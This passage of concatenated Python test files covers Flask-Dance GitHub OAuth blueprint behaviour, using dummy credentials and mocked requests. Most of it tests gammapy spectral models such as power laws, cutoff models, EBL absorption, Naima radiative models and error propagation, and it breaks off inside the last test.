tm.assert_index_equal(index, exp_index)
|
the-stack_0_25206
|
from __future__ import unicode_literals
import pytest
import responses
from urlobject import URLObject
from flask import Flask
from flask_dance.contrib.github import make_github_blueprint, github
from flask_dance.consumer import OAuth2ConsumerBlueprint
from flask_dance.consumer.storage import MemoryStorage
@pytest.fixture
def make_app():
def _make_app(*args, **kwargs):
app = Flask(__name__)
app.secret_key = "whatever"
blueprint = make_github_blueprint(*args, **kwargs)
app.register_blueprint(blueprint)
return app
return _make_app
def test_blueprint_factory():
github_bp = make_github_blueprint(
client_id="foo", client_secret="bar", scope="user:email", redirect_to="index"
)
assert isinstance(github_bp, OAuth2ConsumerBlueprint)
assert github_bp.session.scope == "user:email"
assert github_bp.session.base_url == "https://api.github.com/"
assert github_bp.session.client_id == "foo"
assert github_bp.client_secret == "bar"
assert github_bp.authorization_url == "https://github.com/login/oauth/authorize"
assert github_bp.token_url == "https://github.com/login/oauth/access_token"
def test_load_from_config(make_app):
app = make_app()
app.config["GITHUB_OAUTH_CLIENT_ID"] = "foo"
app.config["GITHUB_OAUTH_CLIENT_SECRET"] = "bar"
resp = app.test_client().get("/github")
url = resp.headers["Location"]
client_id = URLObject(url).query.dict.get("client_id")
assert client_id == "foo"
@responses.activate
def test_context_local(make_app):
responses.add(responses.GET, "https://google.com")
    # set up two apps with two different sets of auth tokens
app1 = make_app(
"foo1",
"bar1",
redirect_to="url1",
storage=MemoryStorage({"access_token": "app1"}),
)
app2 = make_app(
"foo2",
"bar2",
redirect_to="url2",
storage=MemoryStorage({"access_token": "app2"}),
)
# outside of a request context, referencing functions on the `github` object
# will raise an exception
with pytest.raises(RuntimeError):
github.get("https://google.com")
# inside of a request context, `github` should be a proxy to the correct
# blueprint session
with app1.test_request_context("/"):
app1.preprocess_request()
github.get("https://google.com")
request = responses.calls[0].request
assert request.headers["Authorization"] == "Bearer app1"
with app2.test_request_context("/"):
app2.preprocess_request()
github.get("https://google.com")
request = responses.calls[1].request
assert request.headers["Authorization"] == "Bearer app2"
|
the-stack_0_25207
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import operator
import pytest
import numpy as np
from numpy.testing import assert_allclose
import astropy.units as u
from gammapy.maps import MapAxis
from gammapy.modeling.models import (
SPECTRAL_MODEL_REGISTRY,
BrokenPowerLawSpectralModel,
CompoundSpectralModel,
ConstantSpectralModel,
EBLAbsorptionNormSpectralModel,
ExpCutoffPowerLaw3FGLSpectralModel,
ExpCutoffPowerLawNormSpectralModel,
ExpCutoffPowerLawSpectralModel,
GaussianSpectralModel,
LogParabolaNormSpectralModel,
LogParabolaSpectralModel,
NaimaSpectralModel,
PiecewiseNormSpectralModel,
PowerLaw2SpectralModel,
PowerLawNormSpectralModel,
PowerLawSpectralModel,
SmoothBrokenPowerLawSpectralModel,
SuperExpCutoffPowerLaw4FGLSpectralModel,
TemplateSpectralModel,
)
from gammapy.utils.testing import (
assert_quantity_allclose,
mpl_plot_check,
requires_data,
requires_dependency,
)
def table_model():
energy = MapAxis.from_energy_bounds(0.1 * u.TeV, 100 * u.TeV, 1000).center
model = PowerLawSpectralModel(
index=2.3, amplitude="4 cm-2 s-1 TeV-1", reference="1 TeV"
)
dnde = model(energy)
return TemplateSpectralModel(energy, dnde)
TEST_MODELS = [
dict(
name="powerlaw",
model=PowerLawSpectralModel(
index=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(4 * 2.0 ** (-2.3), "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.9227116204223784, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.650836884969039, "TeV cm-2 s-1"),
),
dict(
name="powerlaw",
model=PowerLawSpectralModel(
index=2 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(1.0, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.6, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(9.210340371976184, "TeV cm-2 s-1"),
),
dict(
name="norm-powerlaw",
model=PowerLawNormSpectralModel(
tilt=2 * u.Unit(""), norm=4.0 * u.Unit(""), reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(1.0, ""),
integral_1_10TeV=u.Quantity(3.6, "TeV"),
eflux_1_10TeV=u.Quantity(9.210340371976184, "TeV2"),
),
dict(
name="powerlaw2",
model=PowerLaw2SpectralModel(
amplitude=u.Quantity(2.9227116204223784, "cm-2 s-1"),
index=2.3 * u.Unit(""),
emin=1 * u.TeV,
emax=10 * u.TeV,
),
val_at_2TeV=u.Quantity(4 * 2.0 ** (-2.3), "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.9227116204223784, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.650836884969039, "TeV cm-2 s-1"),
),
dict(
name="ecpl",
model=ExpCutoffPowerLawSpectralModel(
index=1.6 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
),
val_at_2TeV=u.Quantity(1.080321705479446, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.765838739678921, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(9.901735870666526, "TeV cm-2 s-1"),
e_peak=4 * u.TeV,
),
dict(
name="norm-ecpl",
model=ExpCutoffPowerLawNormSpectralModel(
index=1.6 * u.Unit(""),
norm=4 * u.Unit(""),
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
),
val_at_2TeV=u.Quantity(1.080321705479446, ""),
integral_1_10TeV=u.Quantity(3.765838739678921, "TeV"),
eflux_1_10TeV=u.Quantity(9.901735870666526, "TeV2"),
),
dict(
name="ecpl_3fgl",
model=ExpCutoffPowerLaw3FGLSpectralModel(
index=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
ecut=10 * u.TeV,
),
val_at_2TeV=u.Quantity(0.7349563611124971, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.6034046173089, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(5.340285560055799, "TeV cm-2 s-1"),
),
dict(
name="plsec_4fgl",
model=SuperExpCutoffPowerLaw4FGLSpectralModel(
index_1=1.5,
index_2=2,
amplitude=1 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
expfactor=1e-2,
),
val_at_2TeV=u.Quantity(0.3431043087721737, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(1.2125247, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(3.38072082, "TeV cm-2 s-1"),
),
dict(
name="logpar",
model=LogParabolaSpectralModel(
alpha=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
beta=0.5 * u.Unit(""),
),
val_at_2TeV=u.Quantity(0.6387956571420305, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.255689748270628, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(3.9586515834989267, "TeV cm-2 s-1"),
e_peak=0.74082 * u.TeV,
),
dict(
name="norm-logpar",
model=LogParabolaNormSpectralModel(
alpha=2.3 * u.Unit(""),
norm=4 * u.Unit(""),
reference=1 * u.TeV,
beta=0.5 * u.Unit(""),
),
val_at_2TeV=u.Quantity(0.6387956571420305, ""),
integral_1_10TeV=u.Quantity(2.255689748270628, "TeV"),
eflux_1_10TeV=u.Quantity(3.9586515834989267, "TeV2"),
),
dict(
name="logpar10",
model=LogParabolaSpectralModel.from_log10(
alpha=2.3 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
beta=1.151292546497023 * u.Unit(""),
),
val_at_2TeV=u.Quantity(0.6387956571420305, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.255689748270628, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(3.9586515834989267, "TeV cm-2 s-1"),
e_peak=0.74082 * u.TeV,
),
dict(
name="constant",
model=ConstantSpectralModel(const=4 / u.cm ** 2 / u.s / u.TeV),
val_at_2TeV=u.Quantity(4, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(35.9999999999999, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(198.00000000000006, "TeV cm-2 s-1"),
),
dict(
name="powerlaw_index1",
model=PowerLawSpectralModel(
index=1 * u.Unit(""),
amplitude=2 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
),
val_at_2TeV=u.Quantity(1.0, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(4.605170185, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(18.0, "TeV cm-2 s-1"),
),
dict(
name="ecpl_2",
model=ExpCutoffPowerLawSpectralModel(
index=2.0 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
),
val_at_2TeV=u.Quantity(0.81873075, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.83075297, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.41406327, "TeV cm-2 s-1"),
e_peak=np.nan * u.TeV,
),
dict(
name="GaussianSpectralModel",
model=GaussianSpectralModel(
norm=4 / u.cm ** 2 / u.s, mean=2 * u.TeV, sigma=0.2 * u.TeV
),
val_at_2TeV=u.Quantity(7.978845608028654, "cm-2 s-1 TeV-1"),
val_at_3TeV=u.Quantity(2.973439029468601e-05, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.9999988533937123, "cm-2 s-1"),
integral_infinity=u.Quantity(4, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(7.999998896163037, "TeV cm-2 s-1"),
),
dict(
name="ecpl",
model=ExpCutoffPowerLawSpectralModel(
index=1.8 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
lambda_=0.1 / u.TeV,
alpha=0.8,
),
val_at_2TeV=u.Quantity(0.871694294554192, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(3.026342, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(7.38652453, "TeV cm-2 s-1"),
e_peak=1.7677669529663684 * u.TeV,
),
dict(
name="bpl",
model=BrokenPowerLawSpectralModel(
index1=1.5 * u.Unit(""),
index2=2.5 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
ebreak=0.5 * u.TeV,
),
val_at_2TeV=u.Quantity(0.125, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(0.45649740094103286, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(0.9669999668731384, "TeV cm-2 s-1"),
),
dict(
name="sbpl",
model=SmoothBrokenPowerLawSpectralModel(
index1=1.5 * u.Unit(""),
index2=2.5 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
ebreak=0.5 * u.TeV,
reference=1 * u.TeV,
beta=1,
),
val_at_2TeV=u.Quantity(0.28284271247461906, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(0.9956923907948155, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(2.2372256145972207, "TeV cm-2 s-1"),
),
dict(
name="sbpl-hard",
model=SmoothBrokenPowerLawSpectralModel(
index1=2.5 * u.Unit(""),
index2=1.5 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
ebreak=0.5 * u.TeV,
reference=1 * u.TeV,
beta=1,
),
val_at_2TeV=u.Quantity(3.5355339059327378, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(13.522782989735022, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(40.06681812966845, "TeV cm-2 s-1"),
),
dict(
name="pbpl",
model=PiecewiseNormSpectralModel(
energy=[1, 3, 7, 10] * u.TeV, norms=[1, 5, 3, 0.5] * u.Unit(""),
),
val_at_2TeV=u.Quantity(2.76058404, ""),
integral_1_10TeV=u.Quantity(24.758255, "TeV"),
eflux_1_10TeV=u.Quantity(117.745068, "TeV2"),
),
]
# Add compound models
TEST_MODELS.append(
dict(
name="compound3",
model=TEST_MODELS[0]["model"] + TEST_MODELS[0]["model"],
val_at_2TeV=TEST_MODELS[0]["val_at_2TeV"] * 2,
integral_1_10TeV=TEST_MODELS[0]["integral_1_10TeV"] * 2,
eflux_1_10TeV=TEST_MODELS[0]["eflux_1_10TeV"] * 2,
)
)
TEST_MODELS.append(
dict(
name="compound6",
model=TEST_MODELS[11]["model"] + u.Quantity(4, "cm-2 s-1 TeV-1"),
val_at_2TeV=TEST_MODELS[11]["val_at_2TeV"] * 2,
integral_1_10TeV=TEST_MODELS[11]["integral_1_10TeV"] * 2,
eflux_1_10TeV=TEST_MODELS[11]["eflux_1_10TeV"] * 2,
)
)
TEST_MODELS.append(
dict(
name="table_model",
model=table_model(),
        # Values taken from the power law expectation
val_at_2TeV=u.Quantity(4 * 2.0 ** (-2.3), "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.9227116204223784, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.650836884969039, "TeV cm-2 s-1"),
)
)
@requires_dependency("scipy")
@pytest.mark.parametrize("spectrum", TEST_MODELS, ids=lambda _: _["name"])
def test_models(spectrum):
model = spectrum["model"]
energy = 2 * u.TeV
value = model(energy)
assert_quantity_allclose(value, spectrum["val_at_2TeV"], rtol=1e-7)
if "val_at_3TeV" in spectrum:
energy = 3 * u.TeV
value = model(energy)
assert_quantity_allclose(value, spectrum["val_at_3TeV"], rtol=1e-7)
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
assert_quantity_allclose(
model.integral(energy_min=energy_min, energy_max=energy_max),
spectrum["integral_1_10TeV"],
rtol=1e-5,
)
assert_quantity_allclose(
model.energy_flux(energy_min=energy_min, energy_max=energy_max),
spectrum["eflux_1_10TeV"],
rtol=1e-5,
)
if "e_peak" in spectrum:
assert_quantity_allclose(model.e_peak, spectrum["e_peak"], rtol=1e-2)
# inverse for ConstantSpectralModel is irrelevant.
    # inverse for Gaussian and PiecewiseNormSpectralModel is degenerate
if not (
isinstance(model, ConstantSpectralModel)
or spectrum["name"] == "compound6"
or spectrum["name"] == "GaussianSpectralModel"
or spectrum["name"] == "pbpl"
):
assert_quantity_allclose(model.inverse(value), 2 * u.TeV, rtol=0.01)
if "integral_infinity" in spectrum:
energy_min = 0 * u.TeV
energy_max = 10000 * u.TeV
assert_quantity_allclose(
model.integral(energy_min=energy_min, energy_max=energy_max),
spectrum["integral_infinity"],
)
model.to_dict()
assert "" in str(model)
# check that an array evaluation works (otherwise e.g. plotting raises an error)
e_array = [2, 10, 20] * u.TeV
e_array = e_array[:, np.newaxis, np.newaxis]
val = model(e_array)
assert val.shape == e_array.shape
assert_quantity_allclose(val[0], spectrum["val_at_2TeV"])
def test_model_unit():
pwl = PowerLawSpectralModel()
value = pwl(500 * u.MeV)
assert value.unit == "cm-2 s-1 TeV-1"
@requires_dependency("matplotlib")
def test_model_plot():
pwl = PowerLawSpectralModel(
amplitude=1e-12 * u.Unit("TeV-1 cm-2 s-1"), reference=1 * u.Unit("TeV"), index=2
)
pwl.amplitude.error = 0.1e-12 * u.Unit("TeV-1 cm-2 s-1")
with mpl_plot_check():
pwl.plot((1 * u.TeV, 10 * u.TeV))
with mpl_plot_check():
pwl.plot_error((1 * u.TeV, 10 * u.TeV))
def test_to_from_dict():
spectrum = TEST_MODELS[0]
model = spectrum["model"]
model_dict = model.to_dict()
    # Here we reverse the order of the parameters list to ensure the assignment is correct
model_dict['parameters'].reverse()
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, PowerLawSpectralModel)
actual = [par.value for par in new_model.parameters]
desired = [par.value for par in model.parameters]
assert_quantity_allclose(actual, desired)
actual = [par.frozen for par in new_model.parameters]
desired = [par.frozen for par in model.parameters]
assert_allclose(actual, desired)
def test_to_from_dict_partial_input():
spectrum = TEST_MODELS[0]
model = spectrum["model"]
model_dict = model.to_dict()
# Here we remove the reference energy
model_dict['parameters'].remove(model_dict['parameters'][2])
print(model_dict['parameters'][0])
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, PowerLawSpectralModel)
actual = [par.value for par in new_model.parameters]
desired = [par.value for par in model.parameters]
assert_quantity_allclose(actual, desired)
actual = [par.frozen for par in new_model.parameters]
desired = [par.frozen for par in model.parameters]
assert_allclose(actual, desired)
def test_to_from_dict_compound():
spectrum = TEST_MODELS[-2]
model = spectrum["model"]
assert spectrum["name"] == "compound6"
model_dict = model.to_dict()
assert model_dict["operator"] == "add"
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, CompoundSpectralModel)
actual = [par.value for par in new_model.parameters]
desired = [par.value for par in model.parameters]
assert_quantity_allclose(actual, desired)
@requires_dependency("matplotlib")
@requires_data()
def test_table_model_from_file():
filename = "$GAMMAPY_DATA/ebl/ebl_franceschini.fits.gz"
absorption_z03 = TemplateSpectralModel.read_xspec_model(
filename=filename, param=0.3
)
with mpl_plot_check():
absorption_z03.plot(energy_range=(0.03, 10), energy_unit=u.TeV, flux_unit="")
@requires_data()
def test_absorption():
# absorption values for given redshift
redshift = 0.117
absorption = EBLAbsorptionNormSpectralModel.read_builtin(
"dominguez", redshift=redshift
)
# Spectral model corresponding to PKS 2155-304 (quiescent state)
index = 3.53
amplitude = 1.81 * 1e-12 * u.Unit("cm-2 s-1 TeV-1")
reference = 1 * u.TeV
pwl = PowerLawSpectralModel(index=index, amplitude=amplitude, reference=reference)
# EBL + PWL model
model = pwl * absorption
desired = u.Quantity(5.140765e-13, "TeV-1 s-1 cm-2")
assert_quantity_allclose(model(1 * u.TeV), desired, rtol=1e-3)
assert model.model2.alpha_norm.value == 1.0
    # EBL + PWL model: if the EBL norm is 0, the model reduces to the PWL
model.parameters["alpha_norm"].value = 0
assert_quantity_allclose(model(1 * u.TeV), pwl(1 * u.TeV), rtol=1e-3)
    # EBL + PWL model: test with a norm different from 1
absorption = EBLAbsorptionNormSpectralModel.read_builtin(
"dominguez", redshift=redshift, alpha_norm=1.5
)
model = pwl * absorption
desired = u.Quantity(2.739695e-13, "TeV-1 s-1 cm-2")
assert model.model2.alpha_norm.value == 1.5
assert_quantity_allclose(model(1 * u.TeV), desired, rtol=1e-3)
# Test error propagation
model.model1.amplitude.error = 0.1 * model.model1.amplitude.value
dnde, dnde_err = model.evaluate_error(1 * u.TeV)
assert_allclose(dnde_err / dnde, 0.1)
@requires_data()
def test_absorbed_extrapolate():
ebl_model = "dominguez"
z = 0.0001
alpha_norm = 1
absorption = EBLAbsorptionNormSpectralModel.read_builtin(ebl_model)
values = absorption.evaluate(1 * u.TeV, z, alpha_norm)
assert_allclose(values, 1)
def test_ecpl_integrate():
# regression test to check the numerical integration for small energy bins
ecpl = ExpCutoffPowerLawSpectralModel()
value = ecpl.integral(1 * u.TeV, 1.1 * u.TeV)
assert value.isscalar
assert_quantity_allclose(value, 8.380714e-14 * u.Unit("s-1 cm-2"))
def test_pwl_pivot_energy():
pwl = PowerLawSpectralModel(amplitude="5.35510540e-11 cm-2 s-1 TeV-1")
pwl.covariance = [
[0.0318377 ** 2, 6.56889442e-14, 0],
[6.56889442e-14, 0, 0],
[0, 0, 0],
]
assert_quantity_allclose(pwl.pivot_energy, 3.3540034240210987 * u.TeV)
def test_TemplateSpectralModel_evaluate_tiny():
energy = np.array([1.00000000e06, 1.25892541e06, 1.58489319e06, 1.99526231e06])
values = np.array([4.39150790e-38, 1.96639562e-38, 8.80497507e-39, 3.94262401e-39])
model = TemplateSpectralModel(
energy=energy, values=values * u.Unit("MeV-1 s-1 sr-1")
)
result = model.evaluate(energy)
tiny = np.finfo(np.float32).tiny
mask = abs(values) - tiny > tiny
np.testing.assert_allclose(
values[mask] / values.max(), result[mask].value / values.max()
)
mask = abs(result.value) - tiny <= tiny
assert np.all(result[mask] == 0.0)
def test_TemplateSpectralModel_compound():
energy = [1.00e06, 1.25e06, 1.58e06, 1.99e06] * u.MeV
values = [4.39e-7, 1.96e-7, 8.80e-7, 3.94e-7] * u.Unit("MeV-1 s-1 sr-1")
template = TemplateSpectralModel(energy=energy, values=values)
correction = PowerLawNormSpectralModel(norm=2)
model = CompoundSpectralModel(template, correction, operator=operator.mul)
assert np.allclose(model(energy), 2 * values)
model_mul = template * correction
assert isinstance(model_mul, CompoundSpectralModel)
assert np.allclose(model_mul(energy), 2 * values)
model_dict = model.to_dict()
assert model_dict["operator"] == "mul"
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, CompoundSpectralModel)
assert np.allclose(new_model(energy), 2 * values)
@requires_dependency("naima")
class TestNaimaModel:
# Used to test model value at 2 TeV
energy = 2 * u.TeV
# Used to test model integral and energy flux
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
    # Used to test that array evaluation works
e_array = [2, 10, 20] * u.TeV
e_array = e_array[:, np.newaxis, np.newaxis]
def test_pion_decay(self):
import naima
particle_distribution = naima.models.PowerLaw(
amplitude=2e33 / u.eV, e_0=10 * u.TeV, alpha=2.5
)
radiative_model = naima.radiative.PionDecay(
particle_distribution, nh=1 * u.cm ** -3
)
model = NaimaSpectralModel(radiative_model)
val_at_2TeV = 9.725347355450884e-14 * u.Unit("cm-2 s-1 TeV-1")
integral_1_10TeV = 3.530537143620737e-13 * u.Unit("cm-2 s-1")
eflux_1_10TeV = 7.643559573105779e-13 * u.Unit("TeV cm-2 s-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
assert_quantity_allclose(
model.integral(energy_min=self.energy_min, energy_max=self.energy_max),
integral_1_10TeV,
)
assert_quantity_allclose(
model.energy_flux(energy_min=self.energy_min, energy_max=self.energy_max),
eflux_1_10TeV,
)
val = model(self.e_array)
assert val.shape == self.e_array.shape
model.amplitude.error = 0.1 * model.amplitude.value
out = model.evaluate_error(1 * u.TeV)
assert_allclose(out.data, [5.266068e-13, 5.266068e-14], rtol=1e-3)
def test_ic(self):
import naima
particle_distribution = naima.models.ExponentialCutoffBrokenPowerLaw(
amplitude=2e33 / u.eV,
e_0=10 * u.TeV,
alpha_1=2.5,
alpha_2=2.7,
e_break=900 * u.GeV,
e_cutoff=10 * u.TeV,
)
radiative_model = naima.radiative.InverseCompton(
particle_distribution, seed_photon_fields=["CMB"]
)
model = NaimaSpectralModel(radiative_model)
val_at_2TeV = 4.347836316893546e-12 * u.Unit("cm-2 s-1 TeV-1")
integral_1_10TeV = 1.595813e-11 * u.Unit("cm-2 s-1")
eflux_1_10TeV = 2.851283e-11 * u.Unit("TeV cm-2 s-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
assert_quantity_allclose(
model.integral(energy_min=self.energy_min, energy_max=self.energy_max),
integral_1_10TeV,
rtol=1e-5,
)
assert_quantity_allclose(
model.energy_flux(energy_min=self.energy_min, energy_max=self.energy_max),
eflux_1_10TeV,
rtol=1e-5,
)
val = model(self.e_array)
assert val.shape == self.e_array.shape
def test_synchrotron(self):
import naima
particle_distribution = naima.models.LogParabola(
amplitude=2e33 / u.eV, e_0=10 * u.TeV, alpha=1.3, beta=0.5
)
radiative_model = naima.radiative.Synchrotron(particle_distribution, B=2 * u.G)
model = NaimaSpectralModel(radiative_model)
val_at_2TeV = 1.0565840392550432e-24 * u.Unit("cm-2 s-1 TeV-1")
integral_1_10TeV = 4.449186e-13 * u.Unit("cm-2 s-1")
eflux_1_10TeV = 4.594121e-13 * u.Unit("TeV cm-2 s-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
assert_quantity_allclose(
model.integral(energy_min=self.energy_min, energy_max=self.energy_max),
integral_1_10TeV,
rtol=1e-5,
)
assert_quantity_allclose(
model.energy_flux(energy_min=self.energy_min, energy_max=self.energy_max),
eflux_1_10TeV,
rtol=1e-5,
)
val = model(self.e_array)
assert val.shape == self.e_array.shape
model.B.value = 3 # update B
val_at_2TeV = 5.1985064062296e-16 * u.Unit("cm-2 s-1 TeV-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
def test_ssc(self):
import naima
ECBPL = naima.models.ExponentialCutoffBrokenPowerLaw(
amplitude=3.699e36 / u.eV,
e_0=1 * u.TeV,
e_break=0.265 * u.TeV,
alpha_1=1.5,
alpha_2=3.233,
e_cutoff=1863 * u.TeV,
beta=2.0,
)
radiative_model = naima.radiative.InverseCompton(
ECBPL,
seed_photon_fields=[
"CMB",
["FIR", 70 * u.K, 0.5 * u.eV / u.cm ** 3],
["NIR", 5000 * u.K, 1 * u.eV / u.cm ** 3],
],
Eemax=50 * u.PeV,
Eemin=0.1 * u.GeV,
)
B = 125 * u.uG
radius = 2.1 * u.pc
nested_models = {"SSC": {"B": B, "radius": radius}}
model = NaimaSpectralModel(radiative_model, nested_models=nested_models)
assert_quantity_allclose(model.B.quantity, B)
assert_quantity_allclose(model.radius.quantity, radius)
val_at_2TeV = 1.6703761561806372e-11 * u.Unit("cm-2 s-1 TeV-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV, rtol=1e-5)
model.parameters["B"].value = 100
val_at_2TeV = 1.441331153167876e-11 * u.Unit("cm-2 s-1 TeV-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV, rtol=1e-5)
def test_bad_init(self):
import naima
particle_distribution = naima.models.PowerLaw(
amplitude=2e33 / u.eV, e_0=10 * u.TeV, alpha=2.5
)
radiative_model = naima.radiative.PionDecay(
particle_distribution, nh=1 * u.cm ** -3
)
model = NaimaSpectralModel(radiative_model)
with pytest.raises(NotImplementedError):
NaimaSpectralModel.from_dict(model.to_dict())
with pytest.raises(NotImplementedError):
NaimaSpectralModel.from_parameters(model.parameters)
class TestSpectralModelErrorPropagation:
"""Test spectral model error propagation.
https://github.com/gammapy/gammapy/blob/master/docs/development/pigs/pig-014.rst#proposal
https://nbviewer.jupyter.org/github/gammapy/gammapy-extra/blob/master/experiments/uncertainty_estimation_prototype.ipynb
"""
def setup(self):
self.model = LogParabolaSpectralModel(
amplitude=3.76e-11 * u.Unit("cm-2 s-1 TeV-1"),
reference=1 * u.TeV,
alpha=2.44,
beta=0.25,
)
self.model.covariance = [
[1.31e-23, 0, -6.80e-14, 3.04e-13],
[0, 0, 0, 0],
[-6.80e-14, 0, 0.00899, 0.00904],
[3.04e-13, 0, 0.00904, 0.0284],
]
def test_evaluate_error_scalar(self):
# evaluate_error on scalar
out = self.model.evaluate_error(1 * u.TeV)
assert isinstance(out, u.Quantity)
assert out.unit == "cm-2 s-1 TeV-1"
assert out.shape == (2,)
assert_allclose(out.data, [3.7600e-11, 3.6193e-12], rtol=1e-3)
def test_evaluate_error_array(self):
out = self.model.evaluate_error([1, 100] * u.TeV)
assert out.shape == (2, 2)
expected = [[3.76e-11, 2.469e-18], [3.619e-12, 9.375e-18]]
assert_allclose(out.data, expected, rtol=1e-3)
def test_evaluate_error_unit(self):
out = self.model.evaluate_error(1e6 * u.MeV)
assert out.unit == "cm-2 s-1 TeV-1"
assert_allclose(out.data, [3.760e-11, 3.6193e-12], rtol=1e-3)
def test_integral_error(self):
out = self.model.integral_error(1 * u.TeV, 10 * u.TeV)
assert out.unit == "cm-2 s-1"
assert out.shape == (2,)
assert_allclose(out.data, [2.197e-11, 2.796e-12], rtol=1e-3)
def test_energy_flux_error(self):
out = self.model.energy_flux_error(1 * u.TeV, 10 * u.TeV)
assert out.unit == "TeV cm-2 s-1"
assert out.shape == (2,)
assert_allclose(out.data, [4.119e-11, 8.157e-12], rtol=1e-3)
def test_dnde_error_ecpl_model():
# Regression test for ECPL model
# https://github.com/gammapy/gammapy/issues/2007
model = ExpCutoffPowerLawSpectralModel(
amplitude=2.076183759227292e-12 * u.Unit("cm-2 s-1 TeV-1"),
index=1.8763343736076483,
lambda_=0.08703226432146616 * u.Unit("TeV-1"),
reference=1 * u.TeV,
)
model.covariance = [
[0.00204191498, -1.507724e-14, 0.0, -0.001834819, 0.0],
[-1.507724e-14, 1.6864740e-25, 0.0, 1.854251e-14, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0],
[-0.001834819175, 1.8542517e-14, 0.0, 0.0032559101, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0],
]
out = model.evaluate_error(1 * u.TeV)
assert_allclose(out.data, [1.903129e-12, 2.979976e-13], rtol=1e-3)
out = model.evaluate_error(0.1 * u.TeV)
assert_allclose(out.data, [1.548176e-10, 1.933612e-11], rtol=1e-3)
def test_integral_error_power_law():
energy = np.linspace(1 * u.TeV, 10 * u.TeV, 10)
energy_min = energy[:-1]
energy_max = energy[1:]
powerlaw = PowerLawSpectralModel()
powerlaw.parameters["index"].error = 0.4
powerlaw.parameters["amplitude"].error = 1e-13
flux, flux_error = powerlaw.integral_error(energy_min, energy_max)
assert_allclose(flux.value[0] / 1e-13, 5.0, rtol=1e-3)
assert_allclose(flux_error.value[0] / 1e-14, 7.915984, rtol=1e-3)
def test_integral_error_exp_cut_off_power_law():
energy = np.linspace(1 * u.TeV, 10 * u.TeV, 10)
energy_min = energy[:-1]
energy_max = energy[1:]
exppowerlaw = ExpCutoffPowerLawSpectralModel()
exppowerlaw.parameters["index"].error = 0.4
exppowerlaw.parameters["amplitude"].error = 1e-13
exppowerlaw.parameters["lambda_"].error = 0.03
